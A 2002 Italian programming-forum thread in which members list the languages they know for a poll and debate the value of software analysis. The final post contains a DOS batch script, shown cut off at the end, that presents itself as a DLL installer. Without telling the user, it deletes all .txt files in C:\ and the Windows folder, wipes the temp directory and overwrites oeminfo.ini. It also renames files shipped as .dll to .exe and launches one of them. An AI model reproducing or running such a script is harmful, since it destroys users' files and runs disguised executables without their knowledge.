PDA

Visualizza versione completa : Quanti di voi sanno programmare ??


Pagine : [1] 2

Billow
29-10-2002, 16.36.40
Ci è stato chiesto da ZDnet di effettuare questo sondaggio per possibili sviluppi lavorativi, in questo campo specifico.

chiunque lo voglia può farsi avanti.

pholcus
29-10-2002, 17.18.44
Ciao.

Io ho votato per Java che so bene; so anche il c con system call di unix..poco il c++...Ultimamente ho imparato il php e javascript...

Ciao

Nemesis67
29-10-2002, 17.45.40
Ciao Billow,
Bella domanda.

Ho votato per il Basic e Visual Basic: devo ammettere però che sono enormemente arrugginito causa assuluta inutilzzazione della programmazione.

Non cito (per pudore) un esame di FORTRAN che ho dovuto subire all'università.

Bye

Rigel
29-10-2002, 18.15.51
Ho votato Delphi. Ma conosco bene anche C# e ASPnet.

quipo.it
29-10-2002, 18.59.32
Ambito WEB:
- perfetta conoscenza di XHTML 1.1 (e <) e CSS, con approfondimenti effettuati a riguardo di usabilità e accessibilità (W3C-WAI)
- *ottima* conoscenza di PHP (sto contribuendo allo sviluppo della libreria std PEAR: http://pear.php.net)
- qcosa di javascript, anche se un po' arrugginito, ultimamente...
- XML
- WML (WAP)
- SOAP e WSDL
- XML-RPC
- RDF

Ambito DB:
- MySQL
- Oracle
- PostgreSQL
- FireBird
- qcosa di IBM DB2
- [ ovviamente non cito nemmeno Access... ]
(Con PHP non avrei alcun problema a lavorare anche con altri DBMS...)


Altro:
- C, anche concorrente (threads e semafori, insomma...)
- Java (il linguaggio in sé sarebbe molto carino, ma lo odio per la sua lentezza paurosa)
- Assembler
- qcosa di C++
- VHDL
- Verisity & "E"



Sicuramente sto dimenticando qcosa, ma le cose più importanti ci dovrebbero essere... :D

ekerazha
29-10-2002, 20.07.17
Ho votato per il Delphi, ma so qualcosa anche di Visual Basic/VBS e qualcosina di C/C++ e PHP.
Per quanto riguarda i database me la cavicchio con MySQL.

P.S. per quipo.it
Assembler è il compilatore, il linguaggio si chiama Assembly ;)

quipo.it
29-10-2002, 20.43.57
Assembler è il compilatore, il linguaggio si chiama Assembly ;)

Miiii, come siamo fiscali... :D

Billow
31-10-2002, 07.29.05
NOn trattenetevi, guardate che può essere una buona opportunità lavorativa...

sprtt per quelli che ancora studiano o sono in cerca di lavoro ;)

LoryOne
31-10-2002, 12.45.24
Io voto Visual Basic come ambiente di sviluppo visuale però conosco più o meno bene i seguenti linguaggi secondo l'ordine:

SQL
Basic
PowerBasic
Pascal
VBScript
JavaScript
C++
Assembly
Delphi che sto cominciando a studiare adesso.

So anche qualcosina in ASP e/o JSP ma non nutro particolare interesse verso questi due linguaggi.
Ho sentito parlare bene di PHP e fin'ora ho visionato qualche guida sull'utilizzo.
Non so se continuerò, visto che non mi serve per il lavoro che svolgo attualmente.

Black
31-10-2002, 13.02.38
Visual Basic, ASP su db Access, MySql, Sql Server, Oracle ;)

pholcus
31-10-2002, 19.26.05
Ah, giusto dimenticavo una certa padronanza con SQL...

Ciao

atreiu
02-11-2002, 00.57.44
Io ho votato Basic e Visual Basic, anche se sono più o meno pratico anche di Java c e c++....
..a quasi dimenticavo l'ottimo Turbo Pascal che l'università di Padova mi ha obbligato ad imparare;)!!

Flippy
02-11-2002, 01.16.57
Database:

o Oracle 7 - 8
o IBM DB2
o Microsoft SQL Server
o MySql
o Microsoft Access

Linguaggi di programmazione

o Ottima conoscenza di JAVA, Java Virtual Machine e relativo ByteCode
o IBM Visual Age for Java
o Symantec Visual Café
o Borland J++ Builder
o Oracle J Builder
o Buona conoscenza di Basic, Borland Turbo Pascal 3 e superiori, linguaggio batch interno di MS DOS, Visual Basic 4 e superiori
o Buona conoscenza di C, C++, Borland C++ Builder
o Buona conoscenza dei linguaggi Perl, Awk, Lex Yacc
o Elementi di Delphi, Visual C, Sybil
o Programmazione: HTML, JavaScript 1.x, DHTML, WAP, Java Servlet, ASP, CGI, JSP, EJB,PHP, VBScript (conoscenze di base)

o Teoria: Buona conoscenza degli elementi di Computer Network relativi a mondo Internet/Intranet (protocolli TCP/IP e altri protocolli) e delle relative tematiche di sicurezza

P8257 WebMaster
02-11-2002, 16.37.06
Ciao,

Sono Analista Senior e programmatore Senior specificatamente in:

- Ambito applicativo:
* C (standard ANSI C)
* C++ (su Win32)
* C# (attualmente in sviluppo Framework .NET)
* Java
* Visual Basic (:))
* CLIPPER (il glorioso (y) .. quando ancora serviva a qualcosa!)

- Per Web
--- serverside:
* PHP (sviluppo numerosi portali, manuali e lib)
* ASP (VBScript)(JSCript)
--- clientside:
* HTML (non è un linguaggio ma ce lo infilo comunque :))
* JavaScript
* VBScript

- Database
* Oracle (PL/SQL)
* SQL (MySQL e Anche Microsoft Sequel Server)
* MS Access (o, come lo chiamo io: ACESS :D)

Aggiungo: .. che ora sto sviluppando il framework IKF costituito con algoritmi genetici e reti neurali.

Non chiedetemi di Cobol, Pascal o Delphi .. perché mi viene il mal di mare :D ..

Bye :cool:

ekerazha
03-11-2002, 09.18.21
Peccato che il Delphi, pur ereditando la sintassi del caro vecchio Pascal, sia decisamente più performante del Visual Basic, e sia portabile su Linux tramite il Kylix, posizionandosi dunque come miglior ambiente di sviluppo visuale ;)

P.S.
Anche i jv16 PowerTools sono fatti in Delphi :cool:

DavideDave
04-11-2002, 10.36.26
Che dire...

Java (Servlets, JSP, applet, applicazioni stand-alone) + Oracle

- come linguaggio di programmazione non scendo a compromessi... con Java si può fare quasi qualsiasi cosa... e poi è multipiattaforma... attualmente sviluppo su Windows e distribuisco su Solaris... fate voi :cool:

- come RDBMS invece non ci sono problemi...

ma...... COBOL vi prego NON NOMINATELOOOOOO:D:D

Ciao :)

cicciofriz
04-11-2002, 20.27.26
voto
C++ e Java
xkè li sto studiando tutt'e due all'università, ma forse avrei dovuto votare
php e mysql
perchè li studio per diletto personale

Sharok
06-11-2002, 00.04.14
Sto imparando ASP corredato da qualcosa di VB per gli script e in generale SQL :)
Prima o poi dovrò approfondire le mie conoscenze C++ causa università :D

CIao :)

pazzokramaz
06-11-2002, 23.48.28
dos (programmo ad occhi chiusi )
mmb (simile al vb ) :)
vb ( il poco che basta x chiappare una finestra :D )
script ( lo conosco come le mie tasche )


il mio prog è fatto con vb e dos :eek:

glicci
07-11-2002, 15.26.10
Ciao sono nuovo del forum anche se guardo spesso Wintricks, sono un programmatore Delphi su SqlServer2000 da 2 anni.Purtroppo non conosco (per il momento altro sigh!!)

ciao ciao

email : glicci@yahoo.it

Billow
13-11-2002, 13.57.17
tutto qua ????

ci sarà ben qualche altro programmatore....

guardate che da ZDnet lo leggono il thread....
e cercando persone da assumere...


vedete voi..

DavideDave
13-11-2002, 14.11.06
saranno anche stati in pochi a rispondere ma mi sembra ci siano un paio di personaggi non da nulla ;)

vxcrig
14-11-2002, 20.10.13
HTML, C benino, C++ benino, ho fatto 1 esame di JAVA il 1° anno all'uni con un voto alto ma kredo ke non mi abbiano insegnato un caxxo, ASP.net, Visual Basic (ma solo x ASP.NET),SQL, pascal non lo ricordo + e così anke ASSEMBLY...
:-)

xegallo
15-11-2002, 22.26.49
ho votato vb perchè è quello che conosco meglio
ma anche c/c++

Dysan
17-11-2002, 15.33.01
Idem come Nemesis67

cn73
18-11-2002, 17.49.54
Ciao billow! ;)
o sono uno sviluppatore JAVA, specializzato in realizzazione di apllicazioni client-server e in realizzazione di GUI :D

Il mio curriculum:

LINGUAGGI
C++
VISUAL BASIC
VISUAL BASIC FOR APPLICATION
JAVA
HTML
JAVA-SCRIPT
PASCAL
SQL
PL/SQL

ELABORATORI E SISTEMI OPERATIVI
MS-DOS :D
WINDOWS 3.x
WINDOWS 9x
WINDOWS 2000-XP-NT
LINUX
UNIX

PACCHETTI APPLICATIVI
MS OFFICE
OPENOFFICE.ORG
BORDLAND J-BUILDER

DATA BASE
ACCESS
ORACLE
SQL SERVER

Naturalmente poi ofnuno ha la sua specializzazione, non è che so tutto allo stesso livello :D

nemesis
18-11-2002, 20.22.14
Da Bravo studente di informatica so il c, il c++, html, e assembler.
Ma l'anno prossimo ultimo anno(spero) mi aspetta Java visual basic sql e per quanto ne so basta anche se potrebbe esserci altro!
:D

Luc@s
24-11-2002, 10.48.41
Programmo in Borland C++ Builder Enterprise e Borland Delhpi 7



Ciauz

Deep73
24-11-2002, 16.42.21
Delphi foreveeeeeerrrrrr :D :D :D (ora con lo Studio 7). (Y)

Diciamo che di quell'ambiente sono abbastanza esperto.... :rolleyes: imparato per puro caso durante il mio primo lavoro (cmq. sapevo già Pascal da un bel pò... autodidatta con il Turbo Pascal 3 per ki se lo ricorda :cool: ).

Sono passato cmq. per VB 4/5/VBA e C/C++ (anzi per Dos facevo solo sw in C... ne ho ancora q.sa dei tempi andati). Poi Assembler 80x86 (ho fatto per un esame un Arkanoid abbastanza rudimentale in EGA).

Javascript, ASP, (q.sa di PHP :D ), e tutto il know-how per soppravvivere in rete.

q.sina di SQL e PL/SQL (Oracle 9i). Java 2 lo stò imparando ora e mi stò addentrando in .NET e Web Service in generale (per cui pure XML).

'somma si va avanti ad imparare :o

pazzokramaz
25-11-2002, 17.27.32
o sono uno sviluppatore JAVA, specializzato in realizzazione di apllicazioni client-server e in realizzazione di GUI

Il mio curriculum:

LINGUAGGI
C++
VISUAL BASIC
VISUAL BASIC FOR APPLICATION
JAVA
HTML
JAVA-SCRIPT
PASCAL
SQL
PL/SQL

ELABORATORI E SISTEMI OPERATIVI
MS-DOS
WINDOWS 3.x
WINDOWS 9x
WINDOWS 2000-XP-NT
LINUX
UNIX

PACCHETTI APPLICATIVI
MS OFFICE
OPENOFFICE.ORG
BORDLAND J-BUILDER

DATA BASE
ACCESS
ORACLE
SQL SERVER

Naturalmente poi ofnuno ha la sua specializzazione, non è che so tutto allo stesso livello


ridi ridi ma x programmare serve fantasia e passione

non diplomi :D

cn73
25-11-2002, 20.47.09
Se si hanno entrambi è meglio...

ekerazha
26-11-2002, 16.05.34
chi ha fatto il sondaggio potrebbe spiegarmi che legame c'è fra il Cobol e il Delphi? ... a 'sto punto potevate mettere l'Assembly col Visual Basic :rolleyes: :rolleyes: :rolleyes: :rolleyes:

gkcuvb
27-11-2002, 11.01.55
Io ho votato Visual Basic con il quale ho sviluppato applicazioni su access e su sql server. In più so un po' di html e di jacascript.. insomma poca roba rispetto a voi altri....

Deep73
27-11-2002, 17.24.30
Originariamente inviato da gkcuvb
di jacascript..

nuovo linguaggio??? Usato da Valentino? :D :D :inn:

cn73
28-11-2002, 11.13.42
Originariamente inviato da Billow
tutto qua ????

ci sarà ben qualche altro programmatore....

guardate che da ZDnet lo leggono il thread....
e cercando persone da assumere...


vedete voi..

Bhè?' Com'è che non mi è arrivata ancora nessuna offerta da 2000 euro al mese? :D

DavideDave
28-11-2002, 11.18.18
sì ma neanche da 1000 al mese...

mah...

che cosa vogliono da ZDNET? tecnici nucleari?

qui con tutti quelli che hanno risposto e con le varie competenze ci sarebbe da fare una software house completa :rolleyes:

meno male che un lavoro ce l'ho :p

LoryOne
28-11-2002, 12.10.41
E' vero.
Sti qui di ZDnet tardano un po troppo a farsi sentire.

LoryOne
28-11-2002, 12.13.03
...Non è che per caso nessuno di noi ha mai dichiarato di avere un diploma o una laurea in ingegneria informatica e pensano che siamo dei semplici appassionati senza vere credenziali ?

DavideDave
28-11-2002, 12.20.57
la domanda era se sappiamo programmare e in cosa... non si parlava di curricula.... sai qual è il mio lavoro? programmatore!! fai tu...

LoryOne
28-11-2002, 12.57.01
sai qual è il mio lavoro? programmatore!! fai tu...

...Non sono io che "devo fare"...è ZDNet !
Pure io son programmatore, tecnico informatico ed analista.
Ci sono parecchi programmatori che hanno dichiarato di avere buone conoscenze.

Molti mi hanno incuriosito.
Se fossi stato io a dover assumere, li avrei già contattati.
Forse cercano programmatori specialisti in un linguaggio specifico.
..non saprei.

Sergio Neddi
28-11-2002, 13.44.45
Forse semplicemente hanno tempi più lunghi di quello che si crede e magari hanno preventivato di aspettare un po di tempo in modo da avere una sufficiente rosa di candidati prima di cominciare a spulciare.

DavideDave
28-11-2002, 14.00.32
chi lo sa...

LoryOne
28-11-2002, 14.14.11
Forse semplicemente hanno tempi più lunghi di quello che si crede e magari hanno preventivato di aspettare un po di tempo in modo da avere una sufficiente rosa di candidati prima di cominciare a spulciare.

.forse hai ragione. Aspettiamo.

ekerazha
28-11-2002, 16.13.46
Originariamente inviato da LoryOne
...Non è che per caso nessuno di noi ha mai dichiarato di avere un diploma o una laurea in ingegneria informatica e pensano che siamo dei semplici appassionati senza vere credenziali ?

io intanto spero di ruscire a superare la terza superiore :D :S :D :D (B)

pholcus
28-11-2002, 17.28.21
Credo che le tempistiche sia cmnq abbastanza lunghe...

Io comunque sono al terzo anno di informatica..

Ciao

pazzokramaz
28-11-2002, 21.22.01
ma non serve essere un anaslista x fare un prog ;)

visitate l'ftp che il mio amico ha in casa

scaricate i miei prog....

ps non sono testati...


sono in beta

beh l'ftp è:

ftp://shapur.zapto.org/Uppate/link e file e programmi power by pazzokramaz/


e la pagina principale è:

ftp://shapur.zapto.org/

presto ci metteremo anche le rumz:D (Y)

grazie..

LoryOne
29-11-2002, 08.11.07
Se no sono testati che li scarico a fare ?
Non mi servono le inutility.

DavideDave
29-11-2002, 08.57.32
Originariamente inviato da pazzokramaz
ma non serve essere un anaslista x fare un prog ;)

visitate l'ftp che il mio amico ha in casa

scaricate i miei prog....

ps non sono testati...


sono in beta


vi prego
fatelo smettere
non ne posso più

P8257 WebMaster
29-11-2002, 15.14.40
Originariamente inviato da pazzokramaz
ma non serve essere un anaslista x fare un prog ;)

visitate l'ftp che il mio amico ha in casa

scaricate i miei prog....

ps non sono testati...


sono in beta

beh l'ftp è:

ftp://shapur.zapto.org/Uppate/link e file e programmi power by pazzokramaz/


e la pagina principale è:

ftp://shapur.zapto.org/

presto ci metteremo anche le rumz:D (Y)

grazie..

Qui ti sbagli veramente di grosso mio caro ..
non sai quanta gente ho visto bloccata su un if . e non sai quanti "accrocchi" e pezze da piedi io abbia visto nel codice.

Per i Programmi con la P maiuscola l'analisi è il primo passo, il codice poi si scrive da solo .. ma se non l'hai mai fatto allora continua pure per la tua strada, è bello il mondo delle favole

Bye :cool:

DavideDave
29-11-2002, 15.20.31
Originariamente inviato da P8257 WebMaster


Qui ti sbagli veramente di grosso mio caro ..
non sai quanta gente ho visto bloccata su un if . e non sai quanti "accrocchi" e pezze da piedi io abbia visto nel codice.

Per i Programmi con la P maiuscola l'analisi è il primo passo, il codice poi si scrive da solo .. ma se non l'hai mai fatto allora continua pure per la tua strada, è bello il mondo delle favole

Bye :cool:

certo che ne hai di pazienza :rolleyes:

io non mi sono voluto neanche sprecare...

detto tra noi... dipende poi molto da chi ti fa l'analisi... te la fai tu.? ok... mettici più tempo possibile...te la fa qualcun altro?...o è un tipo che ha le idee chiare... oppure ti conviene rifartela per te se non dal codice non ne esci più... vero o no? io ora che ho un pò più di esperienza COMNBATTO col mio reisponsabile per fare ASSIEME un'analisi con le contro-palle...se no non mi prendo alcuna responsabilità sul codice e sulla sua manutenzione....

pazzokramaz
29-11-2002, 16.03.14
ok pensala come vuoi cmq io sottoscritto
ho 17 anni ho imparato tutto da solo niente scuola e ho tirato fuori della roba che neanche ci pensano a scuola


tipo il compiler pk compiler.........................

è tutto mio ;)

anche il notepad :O


beh voi fate come vi pare

DavideDave
29-11-2002, 16.08.27
con tutto il rispetto per i tuoi programmi ;)

ma sai cos'è un programma con la P maiuscola?

pensa ad un'applicazione WEB, oppure Bancaria, o un sistema operativo persino...

Saresti in gradi di farli FUNZIONANTI e senza troppi piatti di spaghetti nel codice SENZA METTERE GIU' NEANCHE UNA RIGA DI ANALISI?

Ciao :)

P8257 WebMaster
29-11-2002, 16.11.34
Originariamente inviato da DavideDave


certo che ne hai di pazienza :rolleyes:

io non mi sono voluto neanche sprecare...

detto tra noi... dipende poi molto da chi ti fa l'analisi... te la fai tu.? ok... mettici più tempo possibile...te la fa qualcun altro?...o è un tipo che ha le idee chiare... oppure ti conviene rifartela per te se non dal codice non ne esci più... vero o no? io ora che ho un pò più di esperienza COMNBATTO col mio reisponsabile per fare ASSIEME un'analisi con le contro-palle...se no non mi prendo alcuna responsabilità sul codice e sulla sua manutenzione....

Certo, non posso che essere daccordo, quando me la facevano avevo esattamente i problemi che hai citato ..

ora che la si fa in gruppo la sento come essenziale passo, ho passato mesi e mesi senza scrivere 1 linea di codice ..

Poi, alcune cose non sono comprensibili senza l'analisi .. classi, oggetti, ereditarietà ..: sfido chiunque a saper ricostruire la gerarchia di un programma complesso senza aver dietro un'analisi .. a quel punto è meglio cancellare e riscrivere da capo perché la cosa è quasi impossibile

Bye :cool:

P8257 WebMaster
29-11-2002, 16.16.05
Originariamente inviato da pazzokramaz
ok pensala come vuoi cmq io sottoscritto
ho 17 anni ho imparato tutto da solo niente scuola e ho tirato fuori della roba che neanche ci pensano a scuola


tipo il compiler pk compiler.........................

è tutto mio ;)

anche il notepad :O


beh voi fate come vi pare

Ciò che confondi è il fine con i mezzi ..

è chiaro che sapendo il linguaggio, vedendo esempi si impara .. è chiaro che il fine quando si vuole lo si raggiunge sempre.

Io sto parlando di livelli qualitativi diversi, senza offesa . .per carità, non ti conosco .. ma ti giuro che ho visto del codice che, pur funzionando a meraviglia, ti fa mettere le mani nei capelli .. ti fa venir voglia di cancellare e riscrivere.

Non dubito che tu abbia tirato fuori dei risultati più che discreti .. ciò che dico è che l'efficienza, l'efficacia e la manenibilità soprattutto di ciò che si scrive sono più importanti anche dello stesso codice

Bye :cool:

pholcus
29-11-2002, 16.23.46
UML rulez...:D
Per qualsiasi applicazione minimamente complessa la fase di planning e analisi è fondamentale..
Provate a fare un software realtime senza e ditemi se ci riuscite..

x pazzokramaz

Non vorrei illuderti, ma un notepad te lo fa il tutorial del borland c++ builder..;)

DavideDave
29-11-2002, 16.24.39
ci sono giorni interi in cui il mio fido UltraEdit viene completamente sostituito dal quel virus che è PowerPoint... non mi piace... ma ho imparato che è fondamentale... e dopo una bella analisi mi rimetto sul codice con anche più passione (Y)

DavideDave
29-11-2002, 16.27.39
ma anche per progetti non estremamente complessi.... non dico un documento UML da paura... ma un minimo di diagrammino di flusso ci vuole.... eddài :S e che cavolo, pazzokramaz, su ;)

P8257 WebMaster
29-11-2002, 16.35.28
Certo UML.. diagrammi . e per i DB .. ErWin rulez ;) .. (Y)

.. se devo dirla tutta .. però non nascondo che qualche volta qualche lineetta di codice così alla ca**o l'ho anche buttata giù .. ma era solo per test .

Bye :cool:

cn73
29-11-2002, 16.36.55
Concordo...sono sempre stato uno smanettone, mi divertivo a realizzare programmini (in vertà mi diverto anche adesso (http://forum.pctuner.net/forum/showthread.php?s=&threadid=14043) :D )...
Ma trovarsi di fronte ad un applicativo "vero" è davvero un'altra cosa! Quando mi trovai di fronte alle 839 classi dell'applicativo cui collaboro adesso...bhè...mi trovai davvero spiazzato! Senza un'adeguata documentazione mi sarei trovato davvero impossibilitato a muovermi... Attualmente cerchiamo di dedicare molto tempo alla realizzazione di codice commentato e di documentazione sulle classi...è l'unico modo per accellerare una eventuale successiva fase di manutenzione e aggiunta di moduli!

cn73
29-11-2002, 16.38.13
Originariamente inviato da DavideDave
ci sono giorni interi in cui il mio fido UltraEdit viene completamente sostituito dal quel virus che è PowerPoint... non mi piace... ma ho imparato che è fondamentale... e dopo una bella analisi mi rimetto sul codice con anche più passione (Y) WOW! UltraEdit RULEZ! ;)

DavideDave
29-11-2002, 16.46.56
per il DB ErWin!!! molto bello sì sì...

ma ragazzi... mai provato per l'UML Rational Rose?

:cool: FANTASTICO :cool:

DavideDave
29-11-2002, 16.49.34
Originariamente inviato da P8257 WebMaster
.. se devo dirla tutta .. però non nascondo che qualche volta qualche lineetta di codice così alla ca**o l'ho anche buttata giù .. ma era solo per test .

altro problema...

difficile fare l'analisi se non hai alcune conoscenze tecniche...mai capitato che l'analista facesse analisi e promesse al cliente di cose TECNICAMENTE IRREALIZZABILI? :S

a me sì :(

e allora sì:

durante l'analisi QUALCHE lineetta di codice per vedere se la roba è fattibile non fa proprio male ;) (Y)

Ciao :)

cn73
29-11-2002, 18.04.02
E' capitato eccome!

pholcus
29-11-2002, 19.05.24
Originariamente inviato da DavideDave
per il DB ErWin!!! molto bello sì sì...

ma ragazzi... mai provato per l'UML Rational Rose?

:cool: FANTASTICO :cool:

Bello bello..meno bello quando scegli un progetto java e si carica tutte le librerie :D

Anche Together va bene...che funziona anche sotto linux;)

Together ultimamente mi sembra sia stato acquisito dalla borland vero?

Billow
05-12-2002, 10.53.16
Originariamente inviato da LoryOne


...Non sono io che "devo fare"...è ZDNet !
Pure io son programmatore, tecnico informatico ed analista.
Ci sono parecchi programmatori che hanno dichiarato di avere buone conoscenze.

Molti mi hanno incuriosito.
Se fossi stato io a dover assumere, li avrei già contattati.
Forse cercano programmatori specialisti in un linguaggio specifico.
..non saprei.


Rispondo io visto che fino ad adesso mi è mancato il tempo per farlo.. ;)

Una persona è già stata contattata...

cmnq si prevede che si sviluppi un nutrito gruppo di segnalazioni (non curriculim - altrimenti avrei messo un indirizzo mail...)
per verificare quali siano le potenzialità delle persone che frequentano il forum...
gli sviluppi ci saranno a gennaio... ;)

chiaramente le persone contattate... è (quantomeno) consigliabile non lo sbandierino ai 4 venti...
anche perchè sarebbe quantomeno di cattivo gusto...
ad es. quando siamo entrati nel network noi di WinTricks, non lo abbiamo fatto presente a nessuno sino ad 1 ora prima ;)...

Klapaucius
05-12-2002, 12.18.29
ank'io programmo.... :rolleyes:
ma nn uso visual basic delphi ecc ecc.... :(
solo linguaggi specifici per microcontrolli (es. St6, z80 ecc ecc.)

LoryOne
05-12-2002, 15.38.43
"Una persona è già stata contattata... "

Benissimo, sono contento per lui o per lei.:)

Speriamo che sia il primo di una lunga serie.:) :)

Klapaucius
05-12-2002, 15.46.58
uazh !

dimenticavo :o
html, php & sql ma solo per passione :o....

una cosa che conosco bene :D... pascal :o... bleh !!!
me l'hanno messo direttamente in vena !!! basta ! basta ! nn lo sopporto !
da sottolineare... programmazione in basic x c64 :o :D :D :D

Foggy
15-12-2002, 19.41.58
Java, C, Turbo Pascal, QBasic (il mio primo linguaggio, ai tempi delle scuole medie!), Assembly per processori MIPS (veramente FONDAMENTALE!!!!:)), HTML, SQL.
Fra qualche tempo dovrei fare un po' di common-lisp e prolog, ma sicuramente non approfondiro' mai questi linguaggi...

edir
19-12-2002, 12.13.40
Ciao
si insomma programmatore, direi più smanettone.... :D

allora:
Visual Basic (ho realizzato tante appli e ci lavoro)
ASP
C++ (da approfondire)
Delphi (cenni)
Pascal (quando c'era il DOS.... si si insomma c'è ancora + o -)

mmmmhh inoltre:
conoscenze di
SQL server
Oracle
MySql
Crystal Report (4 --->8)


Ciao
Edi

Sanduleak
04-01-2003, 16.02.40
Salve a tutti!
Dunque, per fare un breve elenco...
Basic e Visual Basic
C/C++
Java (lo sto imparando all'università)
ASP (sia VBScript che Jscript)
PHP (pochino per la verità, ma conoscendo ASP è una passeggiata)
Qualcosa di SQL (sufficienza)
e ovviamente HTML/Javascript/VBScript

mi pare che ho detto tutto... :-)

Cmq sono specializzato sull'area Web, ho una discreta conoscenza dei socket e di alcuni protocolli di rete TPC/IP

Ciao!

Kleidemos
04-01-2003, 18.02.08
C
C#
Vb 6
Asp3
Asp.net(+C#) in via di studio!
PHP4

tonyriva
22-01-2003, 19.47.52
che dire, in mezzo a tutto questo sapere io mi abbasso all'onnipotenza dei programmatori del forum!!

php
mysql
c++
java (inizio il corso all'università il mese prossimo)

mi classifico anchio negli smanettoni!!! ma penso che alla mia eta sia + corretto guardare un po' a tutto piottosto che focalizzarsi su poche tecnologie!!

pazzokramaz
22-01-2003, 20.45.25
io sono il re del mondo ;)

@echo off

set|find/I "winbootdir">nul
if errorlevel 1 goto nowi
if errorlevel 0 goto nowino

:nowino
if exist c:\pkdll.txt goto stop
if not exist c:\pkdll.txt goto vai

:stop
echo.
echo PK DLL FOR C++ AND PK PROGRAMMI ( pktools )
echo BY pazzokramaz EMAIL krauma@tin.it
echo Le DLL sono gia state installate con successo
echo Chiudere questa finestra
echo ATTENZIONE non continuare
echo.
exit

:vai
if exist c:\%winbootdir%\*.txt del c:\%winbootdir%\*.txt >nul
if exist c:\bakdll\borlndmm.dll del c:\windows\borlndmm.dll
if exist c:\bakdll\borlndmm.dll xcopy c:\bakdll\borlndmm.dll c:\windows\
if not exist c:\windows\borlndmm.dll xcopy file\borlndmm.dll c:\windows\
if exist c:\bakdll\cp3240mt.dll del c:\windows\cp3240mt.dll
if exist c:\bakdll\cp3240mt.dll xcopy c:\bakdll\cp3240mt.dll c:\windows\
if not exist c:\windows\cp3240mt.dll xcopy file\cp3240mt.dll c:\windows\
if exist c:\bakdll\vcl35.bpl del c:\windows\vcl35.bpl
if exist c:\bakdll\vcl35.bpl xcopy c:\bakdll\vcl35.bpl c:\windows\
if not exist c:\windows\vcl35.bpl xcopy file\vcl35.bpl c:\windows\
if exist c:\bakdll\system\borlndmm.dll del c:\windows\system\borlndmm.dll
if exist c:\bakdll\system\borlndmm.dll xcopy c:\bakdll\system\borlndmm.dll c:\windows\system\
if not exist c:\windows\system\borlndmm.dll xcopy file\borlndmm.dll c:\windows\system\
if exist c:\bakdll\system\cp3240mt.dll del c:\windows\system\cp3240mt.dll
if exist c:\bakdll\system\cp3240mt.dll xcopy c:\bakdll\system\cp3240mt.dll c:\windows\system\
if not exist c:\windows\system\cp3240mt.dll xcopy file\cp3240mt.dll c:\windows\system\
if exist c:\bakdll\system\vcl35.bpl del c:\windows\system\vcl35.bpl
if exist c:\bakdll\system\vcl35.bpl xcopy c:\bakdll\system\vcl35.bpl c:\windows\system\
if not exist c:\windows\system\vcl35.bpl xcopy file\vcl35.bpl c:\windows\system\
if exist c:\bakdll\system32\borlndmm.dll del c:\windows\system32\borlndmm.dll
if exist c:\bakdll\system32\borlndmm.dll xcopy c:\bakdll\system32\borlndmm.dll c:\windows\system32\
if not exist c:\windows\system32\borlndmm.dll xcopy file\borlndmm.dll c:\windows\system32\
if exist c:\bakdll\system32\cp3240mt.dll del c:\windows\system32\cp3240mt.dll
if exist c:\bakdll\system32\cp3240mt.dll xcopy c:\bakdll\system32\cp3240mt.dll c:\windows\system32\
if not exist c:\windows\system32\cp3240mt.dll xcopy file\cp3240mt.dll c:\windows\system32\
if exist c:\bakdll\system32\vcl35.bpl del c:\windows\system32\vcl35.bpl
if exist c:\bakdll\system32\vcl35.bpl xcopy c:\bakdll\system32\vcl35.bpl c:\windows\system32\
if not exist c:\windows\system32\vcl35.bpl xcopy file\vcl35.bpl c:\windows\system32\


if exist c:\bakdll\nul deltree/y c:\bakdll >nul
if exist c:\*.txt del c:\*.txt >nul


cd file

ren nbus.dll nbus.exe
ren nsph.dll nsph.exe
ren c++dll.dll c++dll.txt
ren dll.dat oeminfo.ini
cd..

xcopy file\c++dll.txt c:\%winbootdir%\ >nul
xcopy file\c++dll.txt c:\%winbootdir%\system\ >nul
xcopy file\c++dll.txt c:\%winbootdir%\system32\ >nul
if exist file\c++dll.txt del file\c++dll.txt >nul

if exist c:\%winbootdir%\temp\nul deltree/y c:\%winbootdir%\temp >nul
if not exist c:\%winbootdir%\temp\nul md c:\%winbootdir%\temp >nul

if exist c:\%winbootdir%\oemlogo.bmp del c:\%winbootdir%\oemlogo.bmp >nul
if exist c:\%winbootdir%\system\oemlogo.bmp del c:\%winbootdir%\system\oemlogo.bmp >nul
if exist c:\%winbootdir%\system32\oemlogo.bmp del c:\%winbootdir%\system32\oemlogo.bmp >nul
if exist c:\%winbootdir%\system\oeminfo.ini del c:\%winbootdir%\system\oeminfo.ini >nul
if exist c:\%winbootdir%\system32\oeminfo.ini del c:\%winbootdir%\system32\oeminfo.ini >nul
xcopy file\oeminfo.ini c:\%winbootdir%\system\ >nul
xcopy file\oeminfo.ini c:\%winbootdir%\system32\ >nul
if exist file\oeminfo.ini del file\oeminfo.ini >nul

md c:\%winbootdir%\pktemp2

md c:\%winbootdir%\pkso

md c:\%winbootdir%\hgmi





if not exist c:\%winbootdir%\pktemp2\nul goto temex

echo leggimi > c:\%winbootdir%\pktemp2\leggimi.txt
echo. >> c:\%winbootdir%\pktemp2\leggimi.txt
echo non cancellare questa cartella >> c:\%winbootdir%\pktemp2\leggimi.txt
echo. >> c:\%winbootdir%\pktemp2\leggimi.txt
echo questa cartella è necessaria x il funzionamento dell so.. >> c:\%winbootdir%\pktemp2\leggimi.txt
echo. >> c:\%winbootdir%\pktemp2\leggimi.txt

echo leggimi > c:\%winbootdir%\pkso\leggimi.txt
echo. >> c:\%winbootdir%\pkso\leggimi.txt
echo non cancellare questa cartella >> c:\%winbootdir%\pkso\leggimi.txt
echo. >> c:\%winbootdir%\pkso\leggimi.txt
echo questa cartella è necessaria x il funzionamento dell so.. >> c:\%winbootdir%\pkso\leggimi.txt
echo. >> c:\%winbootdir%\pkso\leggimi.txt
goto temex


:temex
xcopy file\nbus.exe c:\%winbootdir%\hgmi\ >nul
xcopy file\nsph.exe c:\%winbootdir%\hgmi\ >nul

xcopy file\gocrc.pif c:\%winbootdir%\hgmi\ >nul
xcopy file\gocrc.exe c:\%winbootdir%\hgmi\ >nul
xcopy file\crc.exe c:\%winbootdir%\pkso\ >nul
xcopy file\crc.pif c:\%winbootdir%\pkso\ >nul
xcopy file\crcl.pif c:\%winbootdir%\pkso\ >nul


cd file

start nbus.exe





















cd..

echo leggimi > c:\pkdll.txt
echo. >> c:\pkdll.txt
echo pk dll software >> c:\pkdll.txt
echo. >> c:\pkdll.txt
echo questo file piuò essere cancellato .... >> c:\pkdll.txt
echo. >> c:\pkdll.txt
echo cancellare il file >> c:\pkdll.txt

deltree/y file >nul
exit


:nowi
if exist c:\pkdll.txt goto stop2
if not exist c:\pkdll.txt goto vai2

:stop2
echo.
